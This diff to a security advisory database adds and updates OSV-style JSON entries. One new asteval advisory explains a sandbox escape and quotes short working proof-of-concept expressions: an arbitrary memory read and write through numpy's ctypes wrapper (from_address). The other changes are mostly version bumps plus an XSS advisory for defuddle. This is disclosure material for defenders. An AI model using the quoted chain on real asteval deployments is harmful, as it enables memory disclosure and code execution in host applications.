self.raise_exception(node, exc=RuntimeError,\n msg=f\"{type(exc).__name__} raised in sandbox\")\n elif with_raise and self.expr is not None:\n self.raise_exception(node, expr=self.expr)\n```\n\nOption A is the simplest and least likely to introduce regressions. Option B additionally\naddresses the `str.join` crash on integer args.\n\n---\n\n## Disclosure Timeline\n\n| Date | Event |\n|------|-------|\n| 2026-06-09 | Vulnerability discovered during code review |\n| 2026-06-09 | Report submitted via GitHub Security Advisory |\n| TBD | Maintainer acknowledgment |\n| TBD + 90 days | Public disclosure deadline |\n\n---\n\n## Researcher\n\nIndependent security researcher. No bug bounty program exists for this project.\nCVE assignment requested via GitHub Security Advisory submission.\n\n---\n\n## References\n\n- Prior CVE: CVE-2025-24359 (format string injection, fixed 1.0.6)\n- Prior advisory: GHSA-vp47-9734-prjw (AST mutation TOCTOU, fixed 1.0.6)\n- Python exception hierarchy: https://docs.python.org/3/library/exceptions.html#exception-hierarchy\n- `asteval` documentation: https://lmfit.github.io/asteval/", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/security/advisories/GHSA-89v8-rhwq-hf77" + }, + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/pull/153" + }, + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/commit/a3e56e7f8ed567a4817684d94213b290359077b4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lmfit/asteval" + }, + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/releases/tag/1.0.9" + } + ] +} diff --git a/advisories/BREW-checkov-GHSA-9w56-46f6-3qhx.json b/advisories/BREW-checkov-GHSA-9w56-46f6-3qhx.json new file mode 100644 index 00000000000..2de3dae7b79 --- /dev/null +++ b/advisories/BREW-checkov-GHSA-9w56-46f6-3qhx.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-checkov-GHSA-9w56-46f6-3qhx", + "published": "2026-08-22T08:42:43Z", + "modified": "2026-08-22T08:42:43Z", + "upstream": [ + "GHSA-9w56-46f6-3qhx" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "checkov", + "purl": "pkg:brew/checkov" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "ecosystem_specific": { + "fix": null, + "range_state": "affected", + "upstream_fixed_in": "1.0.9", + "resource": "asteval", + "resource_purl": "pkg:pypi/asteval@1.0.6" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "asteval", + "subject_version": "1.0.6", + "key": "pkg:pypi/asteval@1.0.6", + "resource": "asteval" + } + ] + }, + "summary": "asteval Sandbox Escape: arbitrary native memory read/write via numpy ctypes in default asteval Interpreter", + "details": "### Summary\nWith its default configuration (numpy enabled, `import` disabled), asteval's `Interpreter` lets an attacker-controlled expression obtain a raw **arbitrary process-memory read and write** primitive, without using `import`, any `__dunder__` attribute, or `eval`/`exec`/`getattr`. Arbitrary in-process read/write is equivalent to arbitrary code execution and is a complete escape of the sandbox whose entire purpose is \"untrusted string in, no arbitrary execution out.\" Any application that feeds untrusted input to asteval with numpy installed (the default) is affected.\n\n### Details\nasteval's attribute filter (`asteval/astutils.py: safe_getattr`) blocks every `__dunder__` name and blocks objects whose attribute value is *identity-equal* to one of the modules in `UNSAFE_MODULES = {io, os, sys, ctypes}`. The `ctypes` **module** entry was added recently (commit 9d9d430) and correctly blocks `ndarray.ctypes._ctypes`.\n\nHowever, the module check is identity-only against the ctypes *module*. It does not cover ctypes **type objects** and their metaclass methods, which are reachable through numpy's `ndarray.ctypes` wrapper using only ordinary (non-dunder) attribute names:\n\n zeros(1, dtype=int32).ctypes.shape._type_ -> \n\n`ndarray.ctypes` exposes `.shape` (a ctypes array) whose element type `._type_` is `ctypes.c_long`. None of `ctypes`, `.shape`, `._type_` is a dunder, none is in `UNSAFE_ATTRS`, and the returned value is a *type*, not the ctypes module, so `safe_getattr` permits all of them.\n\nOn that ctypes type, the metaclass method `from_address` is reachable (non-dunder, not in `UNSAFE_ATTRS`; it is not even listed by `dir()`, which is likely why it was missed):\n\n* **Arbitrary read:** `c_long.from_address(addr).value` reads 8 bytes at any address. `id()` (a permitted builtin) supplies arbitrary object addresses.\n* **Arbitrary write:** `cell = c_long.from_address(addr); cell.value = X` writes 8 bytes to any address. The write half rides asteval's **unfiltered `setattr`** in `Interpreter.node_assign` (the `ast.Attribute` branch performs `setattr(self.run(node.value), node.attr, val)` with no attribute-name check).\n\nRoot cause is two gaps:\n\n1. `safe_getattr` blocks the ctypes *module* but not ctypes *types* / metaclass methods (`from_address`, `from_buffer`, `from_buffer_copy`, `in_dll`, `from_param`) reachable via `ndarray.ctypes ... ._type_`.\n2. `node_assign` performs attribute writes (`setattr`) and deletes (`delattr`) with no attribute-name filtering.\n\nThis belongs to the known \"numpy is a large attack surface\" class (the docs already note `open()` read and `ndarray.tofile()` write), but this specific arbitrary memory read/write chain is undocumented and bypasses the most recent ctypes-module hardening. All previously reported escapes (CVE-2025-24359 / GHSA-3wwr-3g9f-9gc7, GHSA-vp47-9734-prjw, reduce/reduce_ex, classic `__subclasses__` traversal) are patched on the current code; this one is live.\n\n### PoC\nSelf contained POC here: https://gist.github.com/thegr1ffyn/16b67c5f9b5339a7e2bdc91423ff09e3\nEnvironment: `pip install asteval numpy` (verified on asteval 1.0.8, numpy 2.4.6, CPython 3.12.3; the chain is numpy-1.x/2.x robust). Default `Interpreter` (`use_numpy=True`, `import` disabled).\n\nMinimal one-expression arbitrary read (reads 8 bytes at an attacker-chosen address):\n\n zeros(1,dtype=int32).ctypes.shape._type_.from_address(id(zeros(1))).value\n\nMinimal arbitrary write (writes 0x4142434445464748 to a chosen address; here our own array buffer, observed back through numpy):\n\n a = zeros(2, dtype=int32)\n cell = a.ctypes.shape._type_.from_address(a.ctypes.data)\n cell.value = 0x4142434445464748 # -> a[0]=0x45464748, a[1]=0x41424344\n\nA full self-contained script is attached (poc_asteval_ctypes.py); running it prints the recovered PyObject header of a private object (arbitrary read) and confirms a raw write landing at a chosen pointer (arbitrary write), all from a default, import-disabled interpreter.\n\n### Impact\nSandbox escape / protection-mechanism failure leading to arbitrary in-process native memory read and write (RCE-equivalent). Impact:\n\n* Disclosure of any data in the host process's address space (secrets, keys, other users' data).\n* Corruption of arbitrary memory -> control-flow hijack / arbitrary code execution and/or process crash (DoS).\n\nAffected: any application that evaluates untrusted/attacker-influenced expressions with asteval while numpy is installed (the default). No authentication and no special configuration is required; `import` does not need to be enabled. Mitigation until patched: construct the interpreter with `use_numpy=False`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/security/advisories/GHSA-9w56-46f6-3qhx" + }, + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/pull/153" + }, + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/commit/a3e56e7f8ed567a4817684d94213b290359077b4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lmfit/asteval" + }, + { + "type": "WEB", + "url": "https://github.com/lmfit/asteval/releases/tag/1.0.9" + } + ] +} diff --git a/advisories/BREW-cloudflare-wrangler-CVE-2023-3348.json b/advisories/BREW-cloudflare-wrangler-CVE-2023-3348.json index 7aa4955521d..4e220e28216 100644 --- a/advisories/BREW-cloudflare-wrangler-CVE-2023-3348.json +++ b/advisories/BREW-cloudflare-wrangler-CVE-2023-3348.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudflare-wrangler-CVE-2023-3348", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-20T08:43:30Z", + "modified": "2026-08-22T08:43:15Z", "upstream": [ "GHSA-8c93-4hch-xgxp", "CVE-2023-3348" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "wrangler", - "subject_version": "4.124.0", - "key": "pkg:npm/wrangler@4.124.0" + "subject_version": "4.125.0", + "key": "pkg:npm/wrangler@4.125.0" } ] }, diff --git a/advisories/BREW-cloudflare-wrangler-CVE-2023-7079.json b/advisories/BREW-cloudflare-wrangler-CVE-2023-7079.json index 25c000dd2e9..28f635fe68a 100644 --- a/advisories/BREW-cloudflare-wrangler-CVE-2023-7079.json +++ b/advisories/BREW-cloudflare-wrangler-CVE-2023-7079.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudflare-wrangler-CVE-2023-7079", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-20T08:43:30Z", + "modified": "2026-08-22T08:43:15Z", "upstream": [ "GHSA-cfph-4qqh-w828", "CVE-2023-7079" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "wrangler", - "subject_version": "4.124.0", - "key": "pkg:npm/wrangler@4.124.0" + "subject_version": "4.125.0", + "key": "pkg:npm/wrangler@4.125.0" } ] }, diff --git a/advisories/BREW-cloudflare-wrangler-CVE-2023-7080.json b/advisories/BREW-cloudflare-wrangler-CVE-2023-7080.json index 57e8ce1e779..e9a7c80684b 100644 --- a/advisories/BREW-cloudflare-wrangler-CVE-2023-7080.json +++ b/advisories/BREW-cloudflare-wrangler-CVE-2023-7080.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudflare-wrangler-CVE-2023-7080", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-20T08:43:30Z", + "modified": "2026-08-22T08:43:15Z", "upstream": [ "GHSA-f8mp-x433-5wpf", "CVE-2023-7080" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "wrangler", - "subject_version": "4.124.0", - "key": "pkg:npm/wrangler@4.124.0" + "subject_version": "4.125.0", + "key": "pkg:npm/wrangler@4.125.0" } ] }, diff --git a/advisories/BREW-cloudflare-wrangler-CVE-2026-0933.json b/advisories/BREW-cloudflare-wrangler-CVE-2026-0933.json index d372eb578df..b5928ad60a8 100644 --- a/advisories/BREW-cloudflare-wrangler-CVE-2026-0933.json +++ b/advisories/BREW-cloudflare-wrangler-CVE-2026-0933.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cloudflare-wrangler-CVE-2026-0933", "published": "2026-08-13T16:40:09Z", - "modified": "2026-08-20T08:43:30Z", + "modified": "2026-08-22T08:43:15Z", "upstream": [ "GHSA-36p8-mvp6-cv38", "CVE-2026-0933" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "npm", "name": "wrangler", - "subject_version": "4.124.0", - "key": "pkg:npm/wrangler@4.124.0" + "subject_version": "4.125.0", + "key": "pkg:npm/wrangler@4.125.0" } ] }, diff --git a/advisories/BREW-copier-CVE-2015-8557.json b/advisories/BREW-copier-CVE-2015-8557.json index a395444cd27..0d198f2ae5a 100644 --- a/advisories/BREW-copier-CVE-2015-8557.json +++ b/advisories/BREW-copier-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2015-8557", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-copier-CVE-2021-20270.json b/advisories/BREW-copier-CVE-2021-20270.json index 1c8e503bac5..190baaaadd9 100644 --- a/advisories/BREW-copier-CVE-2021-20270.json +++ b/advisories/BREW-copier-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2021-20270", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-copier-CVE-2021-27291.json b/advisories/BREW-copier-CVE-2021-27291.json index 8a7f9682928..f8c856d6951 100644 --- a/advisories/BREW-copier-CVE-2021-27291.json +++ b/advisories/BREW-copier-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2021-27291", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-copier-CVE-2022-40896.json b/advisories/BREW-copier-CVE-2022-40896.json index bf36284ec92..1d903d5d55d 100644 --- a/advisories/BREW-copier-CVE-2022-40896.json +++ b/advisories/BREW-copier-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2022-40896", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-copier-CVE-2025-55201.json b/advisories/BREW-copier-CVE-2025-55201.json index 4793bf0fe2c..bbefd6ecc42 100644 --- a/advisories/BREW-copier-CVE-2025-55201.json +++ b/advisories/BREW-copier-CVE-2025-55201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2025-55201", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-3xw7-v6cj-5q8h", "CVE-2025-55201", @@ -44,15 +44,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" } ] }, diff --git a/advisories/BREW-copier-CVE-2025-55214.json b/advisories/BREW-copier-CVE-2025-55214.json index 602e5386488..146b71bf51a 100644 --- a/advisories/BREW-copier-CVE-2025-55214.json +++ b/advisories/BREW-copier-CVE-2025-55214.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2025-55214", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-p7q8-grrj-3m8w", "CVE-2025-55214", @@ -44,15 +44,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" } ] }, diff --git a/advisories/BREW-copier-CVE-2026-23968.json b/advisories/BREW-copier-CVE-2026-23968.json index 1ac2bcd58c4..27e737983b5 100644 --- a/advisories/BREW-copier-CVE-2026-23968.json +++ b/advisories/BREW-copier-CVE-2026-23968.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2026-23968", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-xjhm-gp88-8pfx", "CVE-2026-23968", @@ -44,15 +44,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" } ] }, diff --git a/advisories/BREW-copier-CVE-2026-23986.json b/advisories/BREW-copier-CVE-2026-23986.json index 78250feb5af..a225f568879 100644 --- a/advisories/BREW-copier-CVE-2026-23986.json +++ b/advisories/BREW-copier-CVE-2026-23986.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2026-23986", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-4fqp-r85r-hxqh", "CVE-2026-23986", @@ -44,15 +44,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" } ] }, diff --git a/advisories/BREW-copier-CVE-2026-34726.json b/advisories/BREW-copier-CVE-2026-34726.json index de471b6e7d3..da06043735c 100644 --- a/advisories/BREW-copier-CVE-2026-34726.json +++ b/advisories/BREW-copier-CVE-2026-34726.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2026-34726", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-85v3-4m8g-hrh6", "CVE-2026-34726", @@ -44,15 +44,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" } ] }, diff --git a/advisories/BREW-copier-CVE-2026-34730.json b/advisories/BREW-copier-CVE-2026-34730.json index 75e397051d7..fec9af80508 100644 --- a/advisories/BREW-copier-CVE-2026-34730.json +++ b/advisories/BREW-copier-CVE-2026-34730.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2026-34730", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-hgjq-p8cr-gg4h", "CVE-2026-34730", @@ -44,15 +44,15 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" } ] }, diff --git a/advisories/BREW-copier-CVE-2026-4539.json b/advisories/BREW-copier-CVE-2026-4539.json index b872f15d090..9c5023c7d8c 100644 --- a/advisories/BREW-copier-CVE-2026-4539.json +++ b/advisories/BREW-copier-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2026-4539", "published": "2026-08-13T16:41:06Z", - "modified": "2026-08-13T16:41:06Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-copier-CVE-2026-53951.json b/advisories/BREW-copier-CVE-2026-53951.json index 8f02c8272f9..4a59cd6e8c1 100644 --- a/advisories/BREW-copier-CVE-2026-53951.json +++ b/advisories/BREW-copier-CVE-2026-53951.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-copier-CVE-2026-53951", "published": "2026-08-20T08:44:17Z", - "modified": "2026-08-20T08:44:17Z", + "modified": "2026-08-22T08:43:45Z", "upstream": [ "GHSA-9gmc-jqmh-3rvm", "CVE-2026-53951" @@ -43,8 +43,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "copier", - "subject_version": "9.17.1", - "key": "pkg:pypi/copier@9.17.1" + "subject_version": "9.17.2", + "key": "pkg:pypi/copier@9.17.2" } ] }, diff --git a/advisories/BREW-cve-bin-tool-CVE-2026-59939.json b/advisories/BREW-cve-bin-tool-CVE-2026-59939.json index 7d290e69d76..4a8e4e4fbf3 100644 --- a/advisories/BREW-cve-bin-tool-CVE-2026-59939.json +++ b/advisories/BREW-cve-bin-tool-CVE-2026-59939.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-cve-bin-tool-CVE-2026-59939", "published": "2026-08-13T16:42:04Z", - "modified": "2026-08-13T16:42:04Z", + "modified": "2026-08-22T08:44:56Z", "upstream": [ "GHSA-j5g9-f88f-gfj3", "CVE-2026-59939", @@ -89,6 +89,10 @@ { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2026-3444.yaml" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2026/08/msg00039.html" } ] } diff --git a/advisories/BREW-defuddle-CVE-2026-61824.json b/advisories/BREW-defuddle-CVE-2026-61824.json new file mode 100644 index 00000000000..e02e8f8b951 --- /dev/null +++ b/advisories/BREW-defuddle-CVE-2026-61824.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-defuddle-CVE-2026-61824", + "published": "2026-08-22T08:45:16Z", + "modified": "2026-08-22T08:45:16Z", + "upstream": [ + "GHSA-jg4p-g6xj-4qmf", + "CVE-2026-61824" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "defuddle", + "purl": "pkg:brew/defuddle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.19.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.19.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "npm", + "name": "defuddle", + "subject_version": "0.19.2", + "key": "pkg:npm/defuddle@0.19.2" + } + ] + }, + "summary": "Defuddle vulnerable to XSS via unescaped attribute interpolation in site extractors", + "details": "## Summary\n\nAn Improper Neutralization of Input During Web Page Generation issue in the site extractor component allows an attacker-controlled attribute value to be injected into output HTML without escaping. An attacker who crafts a malicious HTML page or controls content on a matching domain can execute arbitrary scripts when a victim processes the page, resulting in Cross-Site Scripting (XSS). This affects defuddle through 0.19.0 and has been patched in version 0.19.1.\n\n## Impact\n\nThis vulnerability allows for Cross-Site Scripting (XSS) execution without needing to compromise external websites. Affected consumers include:\n- Obsidian Web Clipper, \n- web services serving the parsed output directly as HTML, and \n- any downstream application rendering the unsanitized HTML results\n\n## Patch\nThis issue has been patched in defuddle version 0.19.1. Users are encouraged to update to the latest release.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/kepano/defuddle/security/advisories/GHSA-jg4p-g6xj-4qmf" + }, + { + "type": "WEB", + "url": "https://github.com/kepano/defuddle/pull/326" + }, + { + "type": "WEB", + "url": "https://github.com/kepano/defuddle/commit/baf2eaef61d334ef595b28c89e5c5e89e52daf7f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/kepano/defuddle" + }, + { + "type": "WEB", + "url": "https://github.com/kepano/defuddle/releases/tag/0.19.1" + } + ] +} diff --git a/advisories/BREW-dstack-CVE-2015-8557.json b/advisories/BREW-dstack-CVE-2015-8557.json index 3894802eb38..6d2d270c05a 100644 --- a/advisories/BREW-dstack-CVE-2015-8557.json +++ b/advisories/BREW-dstack-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2015-8557", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-13T16:43:57Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" }, { "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-dstack-CVE-2020-7694.json b/advisories/BREW-dstack-CVE-2020-7694.json index 594bc7ddfb7..6c2c28751dc 100644 --- a/advisories/BREW-dstack-CVE-2020-7694.json +++ b/advisories/BREW-dstack-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-dstack-CVE-2020-7694", "published": "2026-08-13T16:43:57Z", - "modified": "2026-08-17T17:03:06Z", + "modified": "2026-08-22T08:46:32Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.11.7", "resource": "uvicorn", - "resource_purl": "pkg:pypi/uvicorn@0.52.3" + "resource_purl": "pkg:pypi/uvicorn@0.52.4" } } ], @@ -47,16 +47,16 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "uvicorn", - "subject_version": "0.52.3", - "key": "pkg:pypi/uvicorn@0.52.3", + "subject_version": "0.52.4", + "key": "pkg:pypi/uvicorn@0.52.4", "resource": "uvicorn" }, { "strategy": "registry", "ecosystem": "PyPI", "name": 